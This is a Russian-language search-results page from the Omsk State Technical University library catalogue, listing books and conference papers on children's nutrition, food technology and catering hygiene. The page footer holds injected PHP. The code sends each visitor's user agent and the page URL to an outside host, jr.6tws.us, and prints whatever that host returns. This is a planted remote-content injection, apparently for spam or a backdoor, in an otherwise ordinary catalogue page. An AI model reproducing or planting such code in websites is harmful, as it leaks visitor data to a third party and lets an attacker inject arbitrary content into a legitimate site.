Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

123 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПИТАНИЕ ДЕТЕЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 52
1. 
Каня И. П. Физиология питания [Текст] : учеб. пособие для студентов специальности 260501 "Технология продуктов общественного питания" / И. П. Каня, 2007. - 344 с.
Ключевые слова 
Система пищеварительная -- ПИЩА -- ПИЩЕВАРЕНИЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- МИКРОНУТРИЕНТЫ -- ПИТАНИЕ СБАЛАНСИРОВАННОЕ -- РАЦИОН ПИТАНИЯ -- РЕЖИМ ПИТАНИЯ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕ -- ПРОДУКТЫ МЯСНЫЕ - Питание -- ПРОДУКТЫ РЫБНЫЕ - Питание -- ПРОДУКТЫ МОЛОЧНЫЕ - питание -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ОЖИРЕНИЕ - ПРОФИЛАКТИКА -- кариес - профилактика -- ВЕГЕТАРИНСТВО -- СЫРОЕДЕНИЕ -- ПИТАНИЕ РАЗДЕЛЬНОЕ -- ГОЛОДАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ - ЗДОРОВЬЕ -- Питание - Группа крови
Держатели документа (Информация об экземплярах) 
2. 
Технология молочных продуктов для детского питания [Текст] : учеб. пособие для студентов высш. учеб. заведений / М-во образования и науки РФ, М-во сел. хоз-ва РФ, Алтайский гос. техн. ун-т им. И. И. Ползунова, Омский гос. аграрный ун-т, 2005. - 290 с.
Держатели документа (Информация об экземплярах) 
3. 
2.4.4. Оздоровительные учреждения [Текст] : примерное меню на 7 дней в летних оздоровительных учреждениях (Извлечение из МУ 2.4.4.005-2000), 2004. - 23 с.
Держатели документа (Информация об экземплярах) 
4. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2002. - 269 с.
Держатели документа (Информация об экземплярах) 
5. 
Артемова Е. Н. Основы технологии продукции общественного питания [Текст] : учеб. пособие для студентов высш. учеб. заведений / Е. Н. Артемова, 2008. - 331 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- МЕНЮ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ПРОФИЛАКТИЧЕСКОЕ -- ПИТАНИЕ ДЕТЕЙ -- Питание работников умственного труда -- Питание работников физического труда -- КОНТРОЛЬ КАЧЕСТВА ПРОДУКЦИИ -- Контроль качества сырья -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- ПОЛУФАБРИКАТЫ овощные -- Полуфабрикаты кулинарных изделий -- Полуфабрикаты мучных изделий -- Норма выхода продукции -- Расчет расходов сырья
Держатели документа (Информация об экземплярах) 
6. 
Матюхина З. П. Основы физиологии питания, микробиологии, гигиены и санитарии [Текст] : учеб. для образоват. учреждений нач. проф. образования / З. П. Матюхина, 2007. - 206 с.
7. 
Технология продуктов детского питания [Текст] : учеб. пособие для студентов высш. учеб. заведений / Н. В. Попова, А. Ю. Просеков, Л. Т. Серпунина, С. Ю. Юрьева, 2009. - 471 с.
Держатели документа (Информация об экземплярах) 
8. 
Современные технологии продуктов питания: теория и практика производства [Текст] : материалы междунар. науч.-практ. семинара, 23 апр. 2010 г. / М-во с.х-ва и продовольствия Омской обл., ФГОУ ВПО "ФГОУ ВПО "Омский гос. аграрный ун-т", НОУ ВПО "Омский экономический ин-т", ГОУ ВПО "Кемеровский технологический ин-т пищевой промышленности", "Семипалатинский гос. ун-т им. Шакарима" (Казахстан), Инновационный Евразийский ун-т (Казахстан), 2010. - 335 с.
Оглавление 
  • Пасько, О. В. Становление, развитие и перспективы научно-педагогической школы "биотехнология комбинированных продуктов специального назначения" / О. В. Пасько. - с.6-9
    Кл. слова: БИОТЕХНОЛОГИЯ комбинированных продуктов, ПРОДУКТЫ СПЕЦИАЛЬНОГО НАЗНАЧЕНИЯ
  • Артюхова, С. И.. Проблемы детского питания / С. И. Артюхова, Н. Е. Мальцева, Т. Ф. Ковалева. - с.34-35
    Кл. слова: ПИТАНИЕ ДЕТЕЙ
  • Бессонова, О. В. Технология низколактозного творожного продукта для детей школьного возраста / О. В. Бессонова. - с.39-41
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ
  • Иванов, В. Л. Способ производства твердых сычужных сыров / В. Л. Иванов, О. Н Жидкова, Д. М. Фиалков. - с.104-106
  • Ивкова, И. А. Особенности технологии производства сметанных продуктов / И. А. Ивкова. - с.114-117
  • Макарова, О. В. Разработка молочно-солодовых продуктов для школьного питания / Макарова, О. В. Пасько. - с.154-156
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, ПРОДУКТЫ МОЛОЧНО-солодовые
  • Молибога, Е. А. Влияние различных факторов на порчу пищевых продуктов / Е. А. Молибога. - с.183-186
  • Прянишников, В. В. Использование натуральных пигментов в мясных продуктах для детского питания / В. В. Прянишников. - с.221-228
  • Симоненко, С. В. Комплексная переработка козьего молока / С. В. Симоненко. - с.240-243
  • Склярова, Л. Ю. Традиционные молочные продукты с новыми свойствами / Л. Ю. Склярова. - с.247-248
  • Смирнова, И. А. Использование термокислотного способа коагуляции белков молока в производстве творожной продукции / И. А. Смирнова, М. Д. Хатминская, С. А. Смирнов. - с.252-256
  • Сорокина, Е. В. Применение мембранных методов в молочной промышленности / Е. В. Сорокина, Е. А. Молибога, Н. Б. Гаврилова. - с.258-260
  • Сохряков, С. О. Использование растительных ингредиентов при производстве плавленых сыров и сырных продуктов / С. О. Сохряков, Е. А. Молибога. - с.260-262
  • Стурова, Ю. Г. Молочные продукты с растительными компонентами / Ю. Г. Стурова, Л. Н. Азолкина, Д. В. Белалова. - с.262-266
  • Тарасова, Е. Ю. К вопросу разработки технологии молокосодержащего продукта / Е. Ю. Тарасова, О. В. Пасько. - с.272-274
  • Толеубекова, С. С. Качественный и количественный выбор ингредиентов-обогатителей органолептических показателей и углеродного состава творожного десертного продукта / С. С. Толеубекова. - с.276-279
  • Толстогузова, Т. Т. Перспективные направления в производстве продуктов здорового питания / Т. Т. Толстогузова. - с.279-281
  • Шадрин, М. А. Программно-статистические комплексы - как значимый фактор повышения качества продукции в индустрии питания / М. А. Шадрин. - с.305-307
Держатели документа (Информация об экземплярах) 
9. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
10. 
Лекарства, которые Вы выбираете [Текст] : Справочник, 2001. - 1260 с.
Держатели документа (Информация об экземплярах) 
11. 
Касьянов Г. И. Технология продуктов детского питания [Текст] : Учеб. для студ. высш. учеб. заведений / Г. И. Касьянов, 2003. - 224 с.
Держатели документа (Информация об экземплярах) 
12. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
13. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2001. - 269 с.
Держатели документа (Информация об экземплярах) 
14. 
Матюхина З. П. Основы физиологии питания, гигиены и санитарии [Текст] : Учеб. / З. П. Матюхина, 2001. - 181 с.
Держатели документа (Информация об экземплярах) 
15. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] : Учеб. пособие для колледжей, проф. уч-щ и лицеев / Л. А. Радченко, 2003. - 372 с.
Держатели документа (Информация об экземплярах) 
16. 
Гаврилова Н. Б. Современная технология комбинированных продуктов на молочной основе для специального питания [Текст] : Аналит. обзор / Н. Б. Гаврилова, О. В. Пасько, 2003. - 108 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
17. 
Политика здорового питания [Текст] : Федеральный и региональный уровни, 2002. - 342 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- Питание человека -- ВЕЩЕСТВА пищевые -- ПИЩА -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ -- Микотоксины -- ПИТАНИЕ - ЗДОРОВЬЕ -- Контроль гигиенический -- ФАЛЬСИФИКАЦИЯ продуктов -- Статус пищевой -- ЗДОРОВЬЕ НАСЕЛЕНИЯ - россия -- микронутриенты -- ВИТАМИНЫ - питание -- КАЛЬЦИЙ - ПИТАНИЕ -- МАГНИЙ - ПИТАНИЕ -- ЖЕЛЕЗО - ПИТАНИЕ -- ЙОД - ПИТАНИЕ -- СЕЛЕН - ПИТАНИЕ -- МИКРОЭЛЕМЕНТЫ - ПИТАНИЕ -- ВОЛОКНО пищевое -- ДЕФИЦИТ витаминный -- ПИЩА - ЭКОЛОГИЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ПИТАНИЕ ЗДОРОВОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ШКОЛЬНИКОВ -- РАСТЕНИЯ ТРАНСГЕННЫЕ -- ГЕНЕТИКА РАСТЕНИЙ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- Питание - словарь терминов
Держатели документа (Информация об экземплярах) 
18. 
Покорн Д. Полная энциклопедия лечебного питания [Текст] : энциклопедия / Д. Покорн, 1998. - 574,[1] с.
Ключевые слова 
ПИТАНИЕ ЛЕЧЕБНОЕ -- Гигиена питания -- ПИТАНИЕ ЗДОРОВОЕ -- Питание - здоровье -- Питание сбалансированное -- БЕЛКИ - питание -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- САХАР - питание -- ЖИРЫ - питание -- ВИТАМИНЫ -- Натрий - питание -- Калий - питание -- Кальций - питание -- Магний - питание -- Фосфор - питание -- Микроэлементы - питание -- Йод - питание -- Фтор - питание -- Железо - питание -- Цинк - питание -- Селен - питание -- Медь - питание -- Хром - питание -- Клетчатка - питание -- ВОДА - питание -- Диета геропрофилактическая -- Диета молочная -- Диета рыбная -- Вегетаринство -- Питание макробиотическое -- Гастрономия -- Питание женщин беременных -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ УЧАЩИХСЯ -- Питание спортсменов -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- Питание диетотерапевтическое -- ДИЕТА ЛЕЧЕБНАЯ -- КОРМЛЕНИЕ -- ОБМЕН ВЕЩЕСТВ - нарушения -- Диабет сахарный -- Гипогликемия -- Остеопороз -- Диета для похудения -- Анемия -- Аллергия пищевая -- Авитаминоз -- Ожирение -- ПОСТ православный -- Сбор лекарственный -- РАСТЕНИЯ ЦЕЛЕБНЫЕ
Держатели документа (Информация об экземплярах) 
19. 
Рязанова О. А. Товароведение продуктов детского питания [Текст] : Учеб. пособие для вузов / О. А. Рязанова, М. А. Николаева, 2003. - 142 с.
Держатели документа (Информация об экземплярах) 
20. 
Простакова, Татьяна Михайловна. Технология приготовления пищи [Текст] / Т. М. Простакова, 1999. - 351 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.69 с.12 запросов, 0.38c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;